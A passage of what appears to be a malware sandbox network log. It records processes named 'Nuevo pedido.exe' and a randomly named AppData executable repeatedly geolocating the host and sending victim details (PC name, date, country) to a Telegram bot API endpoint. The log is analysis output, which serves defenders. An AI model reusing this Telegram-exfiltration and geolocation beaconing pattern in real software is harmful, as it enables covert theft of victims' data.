2025-01-09 15:36:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49753	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:10 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:10 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751759 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdIw%2BlHlJSInzXlRemj8dr1icnxvHDfRkbbA9VJSNwI21Kv89LTAfnZ6dPGVPThQYL1q1b6wIPRTIy7OY9YJ13mqiXK7xLMqN6uznZq%2FiltBxkkxELiVPuhzYX9QYgfo6z3jpbD%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580587a4f0fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1535&rtt_var=901&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1902280&cwnd=252&unsent_bytes=0&cid=3f223e3a70280095&ts=144&x=0"
2025-01-09 15:36:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:10 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751759 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b89KPVWQ%2F2XDnjDoBX%2FpRm6fm4%2BxT%2BoTAdZx5WFaYccP8EX%2B0YOyXgUbnuVZ2N3Hvwe%2Blj68zBGVOxkSHJ4nLw73JZKX2CU3B6WXHWEbnVsEFDQjtHlTZgzfULrdqueYj%2FhOhoA2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580590e527293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1974&rtt_var=746&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1479229&cwnd=158&unsent_bytes=0&cid=a2fa3976edf224f3&ts=164&x=0"
2025-01-09 15:36:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49758	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:11 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:11 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751760 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Symj2UFOt6%2FlYGLhKSGy097zyV9KzJw%2FefEg%2BYKDhGJlLxjZ2XPwNtwNeVFrORenSi185P3SnScfNs3nkmVyC2QXWZAGb81ztOcmBBBvckRL0%2B0QWfSYgEQf7EUYluza73ITmpDu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff5806039798ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1792&rtt_var=674&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1622222&cwnd=211&unsent_bytes=0&cid=d3d68b42967d75f1&ts=162&x=0"
2025-01-09 15:36:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49757	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:11 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:11 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751760 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWxpg6gfpLyB5tS1RzPMkJGozxOrcR1vDxXYDoCeC6f4SxDk6qVco14UA7cIVSVA9DNKU52td8vaY14ppprhY0kHc7jd6TfhgXEF%2BlWex9yaKsQWmpknqFKKfl8FVLtPiBnJPFqQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580607bfe41ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1699&rtt_var=638&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1718658&cwnd=192&unsent_bytes=0&cid=ea2f26ad36205a40&ts=349&x=0"
2025-01-09 15:36:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:12 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751761 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCJPwW50kk5zIToEEuT6W8q0IBgfLkgAgIOcVbUKX%2B3BQD%2B0cctbtMuncmvDFJTum48I7CA4J%2BAYIYRGFXrVe6B14%2F%2BbDtaKlTqiMYLUeAaOexp%2F3ZNBlT3Dp5RR6TCq7MAa0kGH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580672da741ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1727&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1637689&cwnd=192&unsent_bytes=0&cid=7bc19cb55d1372a4&ts=153&x=0"
2025-01-09 15:36:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49762	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:12 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751761 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7j%2Bebh2f5Ovva76LywkUD0gjcnPNj%2FPIxImKHJS%2BSLgnhIIyLDhznpzA6BgnvGAcGCfBUaAgQSLjStCDz3bOvPxEiorvdP3kgHSVWimekEn6ZpehNQ5rpxkzNQ%2Bc87HawkbC4Y7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580684a7c4388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1615&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1796923&cwnd=221&unsent_bytes=0&cid=3b15fbf7036f5ee5&ts=293&x=0"
2025-01-09 15:36:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49763	149.154.167.220	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:13 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-09 15:36:13 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 15:36:13 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 15:36:13 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49766	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:13 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:13 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751763 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=frnT7hBHoszLLQq0BRRr9ziiujC2N%2FlLFMoC0UgSYL8nkNrcdZPPzcQKv6yLc41uppoaVbG2Mf1c5LFsAV3DYTi%2BAl6DrvOP99IoiWWgUj38uY1qpcBSzgkUBKTIr3lJUfhxqKzU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff5806f0f908ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1810&rtt_var=689&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1576673&cwnd=211&unsent_bytes=0&cid=21e9dbd6da336ddb&ts=144&x=0"
2025-01-09 15:36:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49769	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:15 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751764 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7%2FDRSmWYVyM2CGRvnvnwhPkLScpQQ1RKVOVHD7lbo%2BePgSHoP8W8JzJ0CeklKv23tH8Izs%2Fcl%2FaBxpQ4pG%2BcenzUqjnvFbM9APUVZxZV14tfISCx6D2IlDsgIZ7XVn%2FjcFYPT1M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580778d211899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1554&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=153&unsent_bytes=0&cid=f1edd046374fbb15&ts=148&x=0"
2025-01-09 15:36:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49774	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:16 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:16 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751765 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zDL3aeOscGG7UbU3WFa1tv5hI15jW0R%2F1e1btfwiKh6uYWEJF2US6xdTkUbnKahWLr4OLA%2FgJBEebYnLooWmqoPeiHl801JC8qM%2F4AGndzr6S9NGmbNzCsBbHfNuX8n%2FegLUVCvj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580800a337293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2003&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1409946&cwnd=158&unsent_bytes=0&cid=1700a769d375292e&ts=146&x=0"
2025-01-09 15:36:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United 